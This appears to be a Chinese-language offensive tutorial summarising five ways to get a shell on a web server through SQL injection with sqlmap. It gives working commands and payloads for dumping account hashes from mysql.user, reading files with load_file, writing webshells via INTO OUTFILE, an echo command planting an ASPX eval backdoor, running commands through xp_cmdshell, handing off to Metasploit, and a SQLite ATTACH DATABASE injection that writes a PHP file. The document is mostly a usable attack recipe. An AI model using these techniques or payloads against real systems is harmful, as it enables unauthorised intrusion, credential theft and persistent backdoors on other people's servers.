sqlmap拿shell

sqlmap5种思路拿shell总结

①利用dump 管理员类的账户后进入进行站点后拿shell
或者拿到账户后远程连接进行连接进行udf类提取类拿shell
#连接方法
sqlmap -d “mysql://admin:[email protected]:3306/security” admin是账号,psw是密码,后面是地址和端口,security数据库。我们数据库可以用current-db来查看

②利用os-shell 
拿shell
条件①知绝对路径
    ②管理员权限
    ③开启
③利用sql-shell拿shell
条件:dba权限
思路
select host,user,password from mysql.user 读取账户类
select load_file(’/home/wwwroot/index.php’)   
select ''INTO OUTFILE '/home/wwwroot/default/p.php’
写马

④利用os-cmd拿shell
条件
dba-权限
xp_cmdshell开启
如下
判断方法
--os-cmd=whoami
⑤--os-pwn
结合msf提马

sqlmap拿shell_第1张图片
获取绝对路径方法

①sql-shell方法
利用读取配置文件去获取
②os-shell方法
dir /s /b d:\"aa.txt"

写马

①基础的写文件到txt中
echo “thisis test”>d:\matata\t1.txt
②写马到目录文件中
echo ^<%@ Page Language=”Jscript”%^>^<%eval(Request.Item[“pass”],”unsafe”);%^> > d:\matata\test.aspx
#注意 有时候会出现找不到路径的问题
原因:①目录被限制不能写文件-->典型宝塔的权限为777类型chmod的状况特点

可能遇到的情况
在这里插入图片描述
原因:①中文路径的原因
②可能是注册表的问题
原因

从sql server注入到getshell
os-shell爬坑
mssql注入实战总结之狠快准绕
注意:oracle数据库 只支持sql-shell命令

oracle利用java反弹拿shell

特殊:sqlite数据库拿shell

方法一:进入后台去拿shell
方法二:手工注入执行下面的语句拿shell
sqlite aspx拿shell分析以及方法
php拿shell方法

在注入点处执行以下的代码 
'; ATTACH DATABASE '23.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo()?>');

然后生成一个23.php的文件就可以直接访问phpinfo的文件

sqlmap拿shell_第2张图片

你可能感兴趣的:(bash,开发语言)